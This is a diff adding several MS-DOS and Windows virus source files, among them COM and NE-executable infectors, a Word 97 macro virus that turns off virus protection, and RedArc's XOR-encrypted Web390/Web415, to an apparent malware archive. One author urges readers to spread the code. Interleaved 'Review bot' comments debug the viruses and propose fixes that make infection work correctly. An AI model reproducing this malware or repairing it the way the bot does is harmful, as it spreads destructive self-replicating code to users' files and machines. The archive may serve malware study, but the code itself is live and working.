@@ -0,0 +1,118 @@ +Code Segment + Assume CS:Code,DS:Code,ES:Code + + V_Length Equ Program - Main + F_Name Equ 0FC1Eh + F_Time Equ 0FC16h + F_Date Equ 0FC18h + HAdr Equ 0FD00h + DTA Equ 0FC00h + + Org 100h + +Main: + push [BOP] ;bewaar orginele offset programma + + mov ah,1ah ;DTA boven neerzetten + mov dx,DTA ;DTA adres + int 21h + + mov ah,4eh ;zoek naar COM files + mov dx,Offset Target + xor cx,cx + int 21h + +Read_file: + mov ax,3d02h ;open het doelbestand + mov dx,Offset F_Name + int 21h + + mov bx,ax ;bewaar de file handle + + mov bp,cs:[F_Time] ;Bewaar de tijd + mov di,cs:[F_Date] ;Bewaar de datum + + mov ah,3fh ;lees deel van het doelbestand + mov dx,Hadr ;buffer adres + mov cx,V_Length ;lengte van het 4us + int 21h ;naar het hoog adres in + + mov si,dx ;Is het bestand al geinfecteerd? + cmp Word Ptr [si],36ffh + jne Infect_File ;Nee, infecteer het + + mov ah,4fh ;Zoek volgende COM bestand + int 21h + + jc End_Infect + jmp Short Read_File + +Infect_File: + mov ax,4202h ;zoek naar het einde van doelbestand + xor cx,cx ;ax bevat na het na het uitvoeren van + xor dx,dx ;de interrupt de lengte van de file + int 21h + + add ax,100h ;tel 100h bytes PSP erbij op en + mov BOP,ax ;bewaar de lengte van het doelbestand + + mov ah,40h ;overschrijf begin van doelbestand + mov cx,V_Length ;lengte van het 4us + mov dx,HAdr ;buffer + int 21h + + mov ax,4200h ;zoek het begin van het doelbestand op + xor cx,cx + xor dx,dx + int 21h + + mov ah,40h ;schrijf de 4uscode over de file + mov cx,V_Length ;lengte van het 4us + mov dx,Offset Main + int 21h + + mov ax,5701h ;zet orginele datum terug + mov dx,di ;datum + mov cx,bp ;tijd + int 21h + +End_Infect: + mov ah,3eh ;sluit het doelbestand af + int 21h + + mov ah,1ah ;set DTA terug naar default + mov dx,0080h + int 21h + + cld ;voorwaarts + mov di,HAdr ;buffer + push di ;en nog een voor het verplaatsen straks + mov si,Offset MoveBlock ;wijst naar relocator + mov cx,Program - MoveBlock ;lengte relocator + rep movsb ;verplaats het 
block + ret ;en ga er naar toe + +BOP dw Offset Program + +MoveBlock: + mov cx,V_Length ;aantal bytes dat verplaatst wordt + pop si ;haal BOP terug via de stack + mov di,0100h ;hier gaat het allemaal naar toe + push di ;bewaar voor de RET + rep movsb ;verplaatsen + ret ;en start orginele programma op + +Target: + db '*.com',0 + +Program: ;Dit is het fake programma wat later + mov ah,4ch ;door de relocator verplaatst wordt + int 21h ;naar het begin van de file + +Code Ends +End Main + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; diff --git a/MSDOS/Virus.MSDOS.Unknown.w31v.asm b/MSDOS/Virus.MSDOS.Unknown.w31v.asm new file mode 100644 index 00000000..16e11501 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.w31v.asm 
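Review bot: The already-infected test `cmp Word Ptr [si],36ffh` in Read_file carries no comment explaining the constant; 36FFh is the little-endian form of the bytes FF 36, the encoding of the `push [BOP]` instruction at Main, so the check asks whether the host already begins with this code's first instruction. Propose `;FF 36 = opcode of 'push [BOP]' at Main: host already infected`. The file's comments are all Dutch while the neighbouring files in this commit are commented in English; an English header summarising the scheme visible here — DTA moved to `DTA` (0FC00h), `V_Length` bytes of the host read into `HAdr` and appended at end-of-file, the body written over the start, and `MoveBlock` copied to `HAdr` to restore the host at 100h at run time — would let an analyst orient without translating line by line.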
@@ -0,0 +1,330 @@ +;Virus Name: W31V-BETA +;Type : Windows Virus, infects windows executables +;Written by: Stalker X +; +; +;Here it is folks my first windows virus. +;I would firstly just want to say thankyou to qark and quantum for this +;virus is based on the infection of a windows virus as discribed in VLAD-#4 +;Ok as you can see parts of this virus is based on WinSurfer, BUT as you +;can also see it's more compact. Instead of using dropper code I used a +;software fuse. This virus also does not go TSR in windows, it infects on +;execute. The reason why I did not make it TSR is because it's to mutch work +;for me :) and secondly well at the rate Windows users restart programs there +;is no need to go TSR! +;This is my first try so bare with me :) ooooh yes all that comments is +;not ment for you the reader ... BUT ME!! :) Frankly I get lost in my own +;code if I don't comment it. +;Ok Assemble this virus as a EXE then run it in the dir of a Win EXE +;This virus only infects one file at a time but it does change dir's to +;find a file. Nothing new exept that it's for windows .. if you don't +;understand what I have written ,,,, then get VLAD-#4 +; +;Please do copy this code .. add your own stuff if you want to .. I didn't +;write this so it can sit on a shelf. SO GO WILD.. just don't say you wrote +;the whole thing yourself.... just spread it as far as you can and in +;many diffrent copies as you can. 
+ + jumps +.model tiny +.stack 512 +.code +.286P + assume cs:@code,ds:@code + org 0 + +START: pusha ;save all general regs + push si ;save si + push di ;save di + push ds ;save ds + push es ;save es + +FUSE: jmp Fused ;first time no DPMI + jmp DPMIdetect ;goto dpmi code +Fused: mov ax,cs ;ax=cs + mov ds,ax ;ds=ax + mov word ptr cs:[FUSE],9090h;blow fuse after 1st run + jmp DPMIFin ;skip dpmi code +DPMIdetect: mov ax,1686h ;check for dpmi + int 2fh ;do check + or ax,ax ;check return + jz DPMIfound ;if 0 then dpmi + jmp EXIT ;exit if no dpmi +DPMIfound: mov ax,000ah ;get alias selector + push cs ;save cs + pop bx ;restore cs in bx + int 31h ;do get alias + push ax ;save ax + pop ds ;restore ax ds +DPMIFin: mov ah,1ah ;set DTA + mov dx,offset DTA ;set DTA ofs + int 21h ;do set DTA + +FindFirst: xor cx,cx ;set f attrib + mov ah,4eh ;find first file + mov dx,offset FSPEC ;set fspec + int 21h ;do find it + jc EXIT ;exit if no exe found + +Check: call Chk4WinEXE ;check if it's a win exe + cmp [TMP],0 ;check return byte + jz FindNext ;go to next exe if not win + + call Infect ;infect the win EXE + mov ah,3eh ;close the exe file + int 21h ;do it + jmp EXIT ;exit to infect only 1 file +FindNext: mov ah,4fh ;find next file + int 21h ;do find it + jnc Check ;go check again for win +ChangeDIR: mov dx,offset DOTDOT ;'..' 
+ mov ah,3bh ;change dir + int 21h ;do change now + jnc FindFirst ;find first file in dir + +EXIT: pop es ;restore es + pop ds ;restore ds + pop di ;restore di + pop si ;restore si + popa ;restore all general regs + db 0eah ;far Jmp +ret_ip: dw 0 ;exit program +ret_set dw 0ffffh ;- + +Chk4WinEXE: mov dx,offset F_Name ;set file name ofs + mov ax,3d02h ;open file for r/w + int 21h ;do open file + jc ChkExit ;exit on error + mov bx,ax ;save handle in bx + + mov si,offset BUFF ;si=offset of buffer + mov ah,3fh ;read function + mov dx,offset BUFF ;dx=offset of buffer + mov cx,512 ;read 512 bytes + int 21h ;do read bytes + + cmp byte ptr [si+18h],40h ;check relocation + jb ChkFinF ;exit if not ok + cmp word ptr [si+3ch],400h ;check NE offset + jne ChkFinF ;exit if not ok + cmp word ptr [si+16h],0 ;CS must be 0 + jne ChkFinF ;exit if not ok + cmp word ptr [si+14h],0 ;IP must be 0 + jne ChkFinF ;exit if not ok + cmp word ptr [si+08h],20h ;check header size + je ChkFin ;exit if not ok + +ChkFinF: mov ah,3eh ;close file + int 21h ;do close file + mov [TMP],0 ;return error + retn ;retn +ChkFin: mov [TMP],1 ;return ok +ChkExit: retn ;do it + + +Infect: mov si,offset BUFF ;si=offset buffer + sub word ptr [si+10h],8 ;move SP back 8 bytes + sub word ptr [si+3ch],8 ;move NE back 8 bytes + + mov ax,4200h ;move r/w pointer + xor cx,cx ;cx=0 + xor dx,dx ;dx=0 + int 21h ;do move r/w pointer + + mov ah,40h ;write to file + mov dx,offset BUFF ;set source offset + mov cx,3eh ;write EXE header back + int 21h ;do write header back + + mov ax,4200h ;move r/w pointer + xor cx,cx ;cx=0 + mov dx,200h ;set to dest + int 21h ;do move r/w pointer + mov ah,40h ;write to file + mov dx,offset winstart ;dx=source offset + mov cx,offset windowsmsgend-offset winstart + int 21h ;write new dos stub + + mov ax,4200h ;move r/w pointer + xor cx,cx ;cx=0 + mov dx,400h ;set offset + int 21h ;do move r/w pointer + mov ah,3fh ;read from file + mov dx,offset BUFF ;dx=offset of buffer + mov cx,512 ;read header + 
int 21h ;do read from file + + inc word ptr [si+1ch] ;inc segment count + mov ax,word ptr [si+1ch] ;ax=segment count + dec ax ;ax=ax-1 + mov cl,8 ;Assume Segs<255 + mul cl ;multiply to get bytes + xor dx,dx ;dx=0 + add ax,word ptr [si+22h] ;ax=total tab size + adc dx,0 ;add with carry(just incase) + mov cx,512 ;dx:ax/512 + div cx ;do it + mov [Move512],ax ;Number of 512pages to mov + mov [MoveLft],dx ;Number of leftover bytes + + push word ptr [si+32h] ;save file alignment value + pop [Al_Sh] ;save alignment shift value + mov [Seek],400h ;setup seek var + + push word ptr [si+16h] ;save host cs + pop [hostcs] ;save NE cs + push word ptr [si+14h] ;save host ip + pop [hostip] ;save NE ip + mov ax,word ptr [si+1ch] ;ax=number of segments + mov word ptr [si+08h],0 ;clr crc + mov word ptr [si+0ah],0 ;clr crc + mov word ptr [si+14h],0 ;set new ip + mov word ptr [si+16h],ax ;set new cs + + mov ax,word ptr [si+22h] ; + cmp word ptr [si+04h],ax ; + jb CmpRes ; + add word ptr [si+04h],8 ; +CmpRes: cmp word ptr [si+24h],ax ; + jb CmpResi ; + add word ptr [si+24h],8 ; +CmpResi: cmp word ptr [si+26h],ax ; + jb CmpModule ; + add word ptr [si+26h],8 ; +CmpModule: cmp word ptr [si+28h],ax ; + jb CmpImp ; + add word ptr [si+28h],8 ; +CmpImp: cmp word ptr [si+2ah],ax ; + jb MoveHead ; + add word ptr [si+2ah],8 ; + +MoveHead: mov ax,[Move512] ;loop to move NE head + or ax,ax ;check if counter=0 + jz Last ;exit if counter=0 + + dec [Move512] ;counter=counter-1 + + mov ax,4200h ;move r/w pointer + xor cx,cx ;cx=0 + mov dx,[Seek] ;dx=seek + sub dx,8 ;dx=dx-8 + int 21h ;do move r/w pointer + + mov ah,40h ;write to file + mov dx,offset BUFF ;dx=source offset + mov cx,512 ;write 512 bytes + int 21h ;do write 512 bytes + + add [Seek],512 ;seek=seek+512 + + mov ax,4200h ;move r/w pointer + xor cx,cx ;cx=0 + mov dx,[Seek] ;dx=seek + int 21h ;do move r/w pointer + + mov ah,3fh ;read file + mov dx,offset BUFF ;dx=offset buffer + mov cx,512 ;read 512 bytes + int 21h ;do read 512 bytes + + jmp 
MoveHead ;continue to move header + +Last: mov ax,4202h ;seek end of file + xor cx,cx ;cx=0 + xor dx,dx ;dx=0 + int 21h ;do seek + mov cl,byte ptr [Al_Sh] ;cl=shift count + push bx ;save bx + mov bx,1 ;bx=1 + shl bx,cl ;calc shift + mov cx,bx ;cx=bx + pop bx ;restore bx + div cx ;divide with shift + + mov di,offset BUFF ;di=buffer offset + add di,[MoveLft] ;calc where to patch + + mov word ptr [di],ax ;patch insert segment tab + mov word ptr [di+2],offset ALL_VIR + mov word ptr [di+4],180h + mov word ptr [di+6],offset ALL_VIR + + mov ax,4200h ;move r/w pointer + xor cx,cx ;cx=0 + mov dx,[Seek] ;dx=seek + sub dx,8 ;dx=dx-8 + int 21h ;do move r/w pointer + + mov ah,40h ;write to file + mov dx,offset BUFF ;dx=source offset + mov cx,[MoveLft] ;write bytes left + add cx,8 ;cx=cx+8 (+segment entry) + int 21h ;do write to file + + mov ax,4202h ;seek end of file + xor cx,cx ;cx=0 + xor dx,dx ;dx=0 + int 21h ;do seek + + mov ax,word ptr ds:[ret_ip] ;save link + mov word ptr [si],ax ;save link + mov ax,[ret_set] ;save link + mov word ptr [si+2],ax ;save link + + mov word ptr ds:[ret_ip],0 ;setup relocation + mov [ret_set],0FFFFh ;! + mov [relocation],1 ;! + mov [reloc2],3 ;! + mov [reloc3],4 ;! + mov [reloc4],offset ret_ip ;! 
+ + mov ah,40h ;write to file + xor dx,dx ;dx=0 + mov cx,offset ALL_CODE ;write the hole body + int 21h ;do write + + mov ax,word ptr [si] ;restore link + mov word ptr ds:[ret_ip],ax ;restore link + mov ax,word ptr [si+2] ;restore link + mov [ret_set],ax ;restore link + + retn ;return from infection + +;-Fake win msg +winstart: call windowsmsg + db 'This program requires Microsoft ' + db 'Windows.',0dh,0ah,'$' +windowsmsg: pop dx + push cs + pop ds + mov ah,9 + int 21h + mov ax,4c01h + int 21h +windowsmsgend: + +TMP dw 0 +Move512 dw 0 +MoveLft dw 0 +Al_Sh dw 0 +Seek dw 0 +DOTDOT db '..',0 +FSPEC db '*.exe',0 +DTA db 21 dup(0) +Attrib db 0 +F_Time dw 0 +F_Date dw 0 +F_SizeL dw 0 +F_SizeH dw 0 +F_Name db 13 dup(0) +IDB db 'w31v-BETA' +BUFF db 512 dup(0) +ALL_VIR: +relocation dw 1 +reloc2 db 3 +reloc3 db 4 +reloc4 dw offset ret_ip +hostcs dw 0 +hostip dw 0 +ALL_CODE: +end START diff --git a/MSDOS/Virus.MSDOS.Unknown.w97_class_poppy.txt b/MSDOS/Virus.MSDOS.Unknown.w97_class_poppy.txt new file mode 100644 index 00000000..55303c3f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.w97_class_poppy.txt 
@@ -0,0 +1,128 @@ +'W97/Class.Poppy.B +'Word 97 Class Object Infector +'First Ever Class Object Infetor + +Sub AutoOpen() + + ' AutoOpen Sub In Document + +On Error GoTo out + + ' Handle Errors + +Options.VirusProtection = False + + ' Turn Off Virus Protection + +Options.SaveNormalPrompt = False + + ' Turn Off Normal.dot Save Prompt + +Options.ConfirmConversions = False + + ' Turn Off Conversion Prompt (from 95 -> 97) + +ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines + + ' Count The Number Of Code Lines In The Document + +nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines + + ' Count The Number Of Code Lines In The Normal.dot + +If nt > 70 And ad > 0 Then GoTo out + + ' If We Are Installed In Both (Lines > 0 and 72) Then Exit + +If nt < 70 Then + + ' If We Are Not In The Normal.dot (Lines < 72) Then Install Us + + Set infect = NormalTemplate.VBProject.VBComponents.Item(1) + + ' Set Normal.dot Class Section As Infect Object (What We Want To Infect) + + ActiveDocument.VBProject.VBComponents.Item(1).Name = infect.Name + + ' Swamp The Class Section Names (Active Doc <- Normal Template) + + ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\class.sys" + + ' Export Our Virus Code + +End If + +If ad = 0 Then Set infect = ActiveDocument.VBProject.VBComponents.Item(1) + + ' If We Are Not In The Active Doc (Lines < 0) Then Install Us + +If Day(Now) = 14 And (Month(Now) > 5) Then MsgBox "I Think " & Application.UserName & " is a big stupid jerk!", 0, "VicodinES Loves You / Class.Poppy" + + ' If The Day And Time Are Right Insult The User + +infect.codemodule.AddFromFile ("c:\class.sys") + + ' Use The Infect Object - Import Your Virus Code + +With infect.codemodule + + ' With The Newly Infected Class Object + + For x = 1 To 4 + + ' Clean Up The First 4 Lines Of Header-Code + + .deletelines 1 + + ' Delete Line 1 - 4 Times + + Next x + +End With + +If nt < 70 Then + + ' If We Just Infected The Normal.Dot + + With 
infect.codemodule + + .replaceline 1, "Sub AutoClose()" + + ' Change AutoOpen (on line 1) to AutoClose + + .replaceline 71, "Sub ToolsMacro()" + + ' Change Sub ViewVBCode (on line 71) to ToolsMacro + + End With + +End If + +With infect.codemodule + + ' With The Newly Infected Object + + For x = 2 To 72 Step 2 + + ' Use Word Object Data As Polymorpic Code On Every Other Line + + .replaceline x, "'" & Application.UserName & Now & Application.ActivePrinter & Application.ActiveWindow + + Next x + +End With + +out: + +If nt > 70 And ad = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName + + ' If We Just Infected A Document Save It On Close + +End Sub + +Sub ViewVBCode() + + ' Stealth Hook + +End Sub + diff --git a/MSDOS/Virus.MSDOS.Unknown.wanderer.asm b/MSDOS/Virus.MSDOS.Unknown.wanderer.asm new file mode 100644 index 00000000..d81eb7a6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.wanderer.asm 
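Review bot: The thresholds in the comments and the code disagree: the code tests `nt > 70` and `nt < 70` while the comments say 72, and the case nt = 70 exactly matches neither branch, so `infect` is never set and `infect.codemodule.AddFromFile` raises straight into the `out:` handler. Either the constant or the comment should change, e.g. `If nt >= 70 And ad > 0 Then GoTo out` and `If nt < 70 Then` with a comment `' 70 = line count of the installed payload`. For the corpus, the hard-coded drop path `c:\class.sys` and the `Options.VirusProtection = False` line are worth naming in the header comment as the stable indicators an analyst would hunt for, since neither is cleaned up after the import.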
@@ -0,0 +1,195 @@ +virus segment public 'code' + assume cs:virus,ds:virus,es:virus + org 0 + +VirusSize equ VirusEnd-$ + +Com: call Begin + call Label2 + +SavedCode: + mov ax,4c00h + int 21h + + org SavedCode+5h + +Label2: pop si + mov di,100h + push di + movsw + movsw + movsb + ret + +Begin: push ds + push es + push ax + xor ax,ax + mov ds,ax + mov ds,ds:[46ah] + cmp Signature,0ACDCh + je Exit + mov ah,4ah + mov bx,-1 + int 21h + sub bx,VirusParas1 + jb Exit + add bh,10h + mov ah,4ah + int 21h + mov ah,48h + mov bx,VirusParas2 + int 21h + jb Exit + dec ax + mov es,ax + inc ax + mov es:[1],ax + mov es,ax + push cs + pop ds + call Label1 +Label1: pop si + sub si,offset Label1 + xor di,di + push di + mov cx,VirusSize + rep movsb + pop ds + mov ax,ds:[84h] + mov word ptr es:OldInt21[0],ax + mov ax,ds:[86h] + mov word ptr es:OldInt21[2],ax + mov byte ptr ds:[467h],0eah + mov word ptr ds:[468h],offset NewInt21 + mov ds:[46ah],es + mov word ptr ds:[84h],7 + mov word ptr ds:[86h],46h +Exit: pop ax + pop ds + pop es + ret + +Header db 0e9h + dw 0 +Signature dw 0ACDCh + +NewInt21: + cmp ah,4bh + jne on1 + jmp exec +on1: cmp ah,4eh + je find + cmp ah,4fh + je find + jmp EOI + + Db ' As wolfs among sheep we have wandered ' + +Find: call interrupt ; call orginal interrupt + jc Ret1 ; error ? + pushf ; save registers + push ax + push bx + push es + mov ah,2fh + call interrupt + mov al,es:[bx+16h] ; get file-time (low byte) + and al,1fh ; seconds + cmp al,1fh ; 62 seconds ? 
+ jne FileOk ; no, file not infected + sub word ptr es:[bx+1ah],VirusSize ; change file-size + sbb word ptr es:[bx+1ch],0 +Time: xor byte ptr es:[bx+16h],10h ; adjust file-time +FileOk: pop es ; restore registers + pop bx + pop ax + popf +ret1: retf 2 + +Exec: push ax + push bx + push cx + push dx + push ds + mov ax,3d02h + call Interrupt + jc short Error + push cs + pop ds + mov bx,ax + mov ah,3fh + mov cx,5h + mov dx,offset SavedCode + call DOS + cmp word ptr cs:SavedCode,'ZM' + je short TheEnd +ComFile:cmp word ptr cs:SavedCode[3],0ACDCh + je short TheEnd + mov al,02h + call Seek + or dx,dx + cmp ah,0f6h + je short Close + sub ax,5 + inc ax + inc ax + mov word ptr ds:Header[1],ax + mov ax,5700h + call dos + push cx + push dx + mov ah,40h + mov cx,VirusSize + xor dx,dx + call DOS + mov al,00h + call Seek + mov ah,40h + mov cx,5 + mov dx,offset Header + call dos +Close: mov ax,5701h + pop dx + pop cx + or cl,1fh + call dos +TheEnd: mov ah,3eh + call Interrupt +Error: pop ds + pop dx + pop cx + pop bx + pop ax + +EOI: db 0eah ; jmp 0:0 +OldInt21 dd 026b1465h + +Seek: mov ah,42h + xor cx,cx + xor dx,dx + +DOS: call Interrupt + jnc Ok + pop ax + jmp Close + +Interrupt: + pushf + call cs:OldInt21 +Ok: ret + +VirusEnd equ $ + +VirusParas1 equ (VirusSize+1fh)/10h+1000h +VirusParas2 equ (VirusSize+0fh)/10h + +virus ends + +end + + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; diff --git a/MSDOS/Virus.MSDOS.Unknown.wasmvir.asm b/MSDOS/Virus.MSDOS.Unknown.wasmvir.asm new file mode 100644 index 00000000..b4aa3a53 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.wasmvir.asm 
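Review bot: The size check in the Exec handler jumps to the wrong label: `je short Close` is taken before the `push cx`/`push dx` that follow the 5700h call, so `Close` pops the saved DS and DX instead, and the five-word frame is unbalanced when `Error` pops and the far jump to OldInt21 returns through a corrupted stack; it should be `je short TheEnd`. The preceding `or dx,dx` sets flags that `cmp ah,0f6h` immediately overwrites, so files above 64K are never rejected, and `je` only excludes sizes whose high byte is exactly F6h; `jnz short TheEnd` after the `or` and `jae short TheEnd` after the `cmp` give the intended too-big test. The `DOS` helper's error path (`pop ax` / `jmp Close`) has the same stack-shape problem when the 3Fh read that precedes the pushes fails.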
@@ -0,0 +1,54 @@
+;WASMVir --> A lame overwriting virus to demonstrate WASM
+;Overwrites all files in the current directory
+;By Lord Natas
+
+ org 100h
+
+Start
+ mov ah,4eh
+ mov cx,7
+ mov dx,offset FileSpec
+Virus
+
+;----- find file
+
+ int 21h
+ jc EndV
+
+;----- open file
+
+ mov ax,3d01h
+ mov dx,9eh
+ int 21h
+ jc Close
+
+ xchg bx,ax
+
+;----- write file
+
+ mov ah,40h
+ mov cl,Length
+ mov dx,offset Start
+ int 21h
+
+Close
+
+;----- close file
+
+ mov ah,3eh
+ int 21h
+
+ mov ah,4fh
+ jmps Virus
+
+EndV
+ db 00C3h ;"RET"
+
+;----- data
+
+ db 'WASMVir'
+
+FileSpec db '*.COM',0
+
+TheEnd
+Length equ offset TheEnd - offset Start
diff --git a/MSDOS/Virus.MSDOS.Unknown.web_390.asm
new file mode 100644
index 00000000..0110b105
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.web_390.asm
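Review bot: The write length is wrong: `mov cl,Length` loads only the low byte, and CH still holds the 07h from `mov cx,7` that served as the search attribute, so each victim is overwritten with 700h+Length bytes read from memory past the end of the virus rather than Length bytes; use `mov cx,Length`. The open-failure branch `jc Close` then runs `mov ah,3eh` with BX holding the previous file's handle (or garbage on the first iteration), so it should jump to the find-next path instead, e.g. `jc Next` with a `Next` label on the `mov ah,4fh` line. The header says "Overwrites all files in the current directory" but `FileSpec` is `'*.COM',0`, so the comment should say .COM files.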
@@ -0,0 +1,225 @@ +Model Tiny +.code +.286 +org 100h +start: + push cs + push offset Entry + retf + db 'DrWeb - !' +BEG_LEN equ $-start +Entry: + pusha + push ds + push es + call En1 +EN_LEN equ $-Entry +En1: + push ds + pop es + xchg ax,di + pop bp + sub bp,EN_LEN + mov bx,1100h + mov ah,4ah + int 21h + jnc ALLOCATED +Exit_Proc: + pop es + pop ds + popa + push cs + push si + retf +ALLOCATED: + mov ax,LBL + add ax,bp + mov cl,4 + shr ax,cl + inc ax + push ds + pop bx + add ax,bx + push ax + push cs + pop ds + pop es +LBL10: + mov si, bp + cld + xor cx,cx + add si, Crypt_Start +LBL0: + mov ax,word ptr ds:[si] + inc cx + mov bx,word ptr ds:[si+2] + inc cx + xchg ah,al + inc cx + xchg bh,bl + inc cx + xchg ax,bx + xor ax,0BEBEh + xor bx,0BEBEh + mov word ptr ds:[si],ax + mov word ptr ds:[si+2],bx + add si,4 + cmp cx, Crypt_LEN + jge LBL1 + jmp short LBL0 +LBL1: +Crypt_Start equ $-Entry + + mov ah,1ah + mov dx,bp + add dx,Crypt_End + mov bx,dx + int 21h + + push es + push cs + pop es + mov di,100h + mov si,bp + add si,Old_BEGIN + mov cx,BEG_LEN + rep movsb + pop es + + cld + mov ah,4eh + mov cx, 20h + mov dx,bp + add dx,C_Mask +Interrupt: + int 21h + jb Not_Found + jmp Test_File +Not_Found: + mov ah,1ah + mov dx,80h + int 21h + jmp Exit_Proc +Test_File: + push bx + add bx,1ah + mov ax,[bx] + and ax,0f000h + cmp ax,0f000h + jnz Len_Tested +Find_Next: + pop bx + mov ah,4fh + jmp Short Interrupt +Len_Tested: + add bx,04h + xchg dx,bx + mov ax,3d02h + int 21h + xchg ax,bx + mov ah,3fh + mov cx,BEG_LEN + mov dx,bp + add dx,Old_BEGIN + push dx + int 21h + pop si + cmp byte ptr ds:[si+14h],'!' 
+ je Close_File + jmp short Uses_File +Close_File: + mov ah,3eh + int 21h + jmp Find_Next + +Uses_File: + mov ax,4202h + xor cx,cx + xor dx,dx + int 21h + push ax + + cld + mov si,bp + xor di,di + mov cx, Crypt_End / 2 + rep movsw + + pusha + push es + pop ds + xor cx,cx + mov si, Crypt_Start +LBL_0: + mov ax,word ptr ds:[si] + inc cx + mov bx,word ptr ds:[si+2] + inc cx + xchg ah,al + inc cx + xchg bh,bl + inc cx + xchg ax,bx + xor ax,0BEBEh + xor bx,0BEBEh + mov word ptr ds:[si],ax + mov word ptr ds:[si+2],bx + add si,4 + cmp cx, Crypt_LEN + jge LBL_1 + jmp short LBL_0 +LBL_1: + popa + + mov ah,40h + mov cx,Crypt_End + xor dx,dx + int 21h + mov ax,4200h + xor cx,cx + xor dx,dx + int 21h + push cs + pop ds + pop ax + pop si + push si + mov di,bp + add ax,100h + add di,New1 + inc di + mov [di],ax + mov ah,40h + mov dx,bp + add dx,New_BEGIN + mov cx,BEG_LEN + int 21h + jmp Close_File + +C_MASK equ $-Entry +db '*.com',0h + +New_BEGIN equ $-Entry + push cs +LI: +New1 equ $-Entry + push offset Entry + retf +Apll equ $-Entry +Rems equ $-LI + db 'DrWeb - !' + +Old_BEGIN equ $-Entry + db 0c3h + db BEG_LEN-1 dup (90h) + +db 'RedArc // [TAVC]' + +Crypt_End equ $-Entry +Crypt_LEN equ $-LBL1 + +DTA db 80h dup (?) + +LBL equ $-Entry + +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.web_415.asm b/MSDOS/Virus.MSDOS.Unknown.web_415.asm new file mode 100644 index 00000000..4900da20 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.web_415.asm 
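Review bot: The already-infected test `cmp byte ptr ds:[si+14h],'!'` reads past what was loaded: the 3Fh read fetches only BEG_LEN bytes into Old_BEGIN, and by my count BEG_LEN is 14 (`push cs` 1, `push offset Entry` 3, `retf` 1, the 9-byte 'DrWeb - !' string), so the '!' marker sits at offset 0Dh and offset 14h lands in the bytes after Old_BEGIN, which never hold '!'. If that count is right, every .COM is reinfected on each run until the 0F000h size test stops it; `cmp byte ptr ds:[si+BEG_LEN-1],'!'` ties the check to the real stub length. The `mov cx, Crypt_End / 2` / `rep movsw` copy also drops the last body byte whenever Crypt_End is odd; `mov cx,Crypt_End` with `rep movsb` is safe either way.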
@@ -0,0 +1,232 @@ +;---------------------------------------------------------------------------- +; Web415 +; ⢮ Search +;---------------------------------------------------------------------------- +; (c) 1997 by I. Dikshew // [TAVC] // -=* Red Arc *=- +;---------------------------------------------------------------------------- + +Model Tiny +.Code +.286 +org 100h +start: + push cs + push offset Entry + retf + db 'DrWeb - !' +BEG_LEN equ $-start +Entry: + pusha + push ds + push es + call En1 +EN_LEN equ $-Entry +En1: + push ds + pop es + xchg ax,di + pop bp + sub bp,EN_LEN + mov bx,1100h + mov ah,4ah + int 21h + jnc ALLOCATED +Exit_Proc: + pop es + pop ds + popa + push cs + push si + retf +ALLOCATED: + mov ax,LBL + add ax,bp + mov cl,4 + shr ax,cl + inc ax + push ds + pop bx + add ax,bx + push ax + push cs + pop ds + pop es +LBL10: + mov si, bp + cld + xor cx,cx + add si, Crypt_Start +LBL0: + mov ax,word ptr ds:[si] + inc cx + mov bx,word ptr ds:[si+2] + inc cx + xchg ah,al + inc cx + xchg bh,bl + inc cx + xchg ax,bx + xor ax,0BEBEh + xor bx,0BEBEh + mov word ptr ds:[si],ax + mov word ptr ds:[si+2],bx + add si,4 + cmp cx, Crypt_LEN + jge LBL1 + jmp short LBL0 +LBL1: +Crypt_Start equ $-Entry + mov ah,1ah + mov dx,bp + add dx,Crypt_End + mov bx,dx + int 21h + push es + push cs + pop es + mov di,100h + mov si,bp + add si,Old_BEGIN + mov cx,BEG_LEN + rep movsb + pop es + mov byte ptr ds:[bp+Count],0 + cld + mov ah,4eh + mov cx, 20h + mov dx,bp + add dx,C_Mask +Interrupt: + int 21h + jb Not_Found + jmp Test_File +Not_Found: + mov ah,1ah + mov dx,80h + int 21h + jmp Exit_Proc +Test_File: + push bx + add bx,1ah + mov ax,[bx] + and ax,0f000h + cmp ax,0f000h + jnz Len_Tested +Find_Next: + pop bx + mov ah,4fh + jmp Short Interrupt +Len_Tested: + add bx,04h + xchg dx,bx + mov ax,3d02h + int 21h + xchg ax,bx + mov ah,3fh + mov cx,BEG_LEN + mov dx,bp + add dx,Old_BEGIN + push dx + int 21h + pop si + cmp byte ptr ds:[si+14h],'!' 
+ je Close_File + jmp short Uses_File +Close_File: + mov ah,3eh + int 21h + mov al,byte ptr ds:[bp+Count] + cmp al,1 + jne Find_Next + pop bx + jmp Not_Found +Uses_File: + mov ax,4202h + xor cx,cx + xor dx,dx + int 21h + push ax + cld + mov si,bp + xor di,di + mov cx, Crypt_End / 2 + rep movsw + pusha + push es + pop ds + xor cx,cx + mov si, Crypt_Start +LBL_0: + mov ax,word ptr ds:[si] + inc cx + mov bx,word ptr ds:[si+2] + inc cx + xchg ah,al + inc cx + xchg bh,bl + inc cx + xchg ax,bx + xor ax,0BEBEh + xor bx,0BEBEh + mov word ptr ds:[si],ax + mov word ptr ds:[si+2],bx + add si,4 + cmp cx, Crypt_LEN + jge LBL_1 + jmp short LBL_0 +LBL_1: + popa + mov ah,40h + mov cx,Crypt_End + xor dx,dx + int 21h + mov ax,4200h + xor cx,cx + xor dx,dx + int 21h + push cs + pop ds + pop ax + pop si + push si + mov di,bp + add ax,100h + add di,New1 + inc di + mov [di],ax + mov ah,40h + mov dx,bp + add dx,New_BEGIN + mov cx,BEG_LEN + int 21h + mov byte ptr ds:[bp+Count],1 + jmp Close_File + +C_MASK equ $-Entry +db '*.com',0h + +New_BEGIN equ $-Entry + push cs +LI: +New1 equ $-Entry + push offset Entry + retf +Apll equ $-Entry 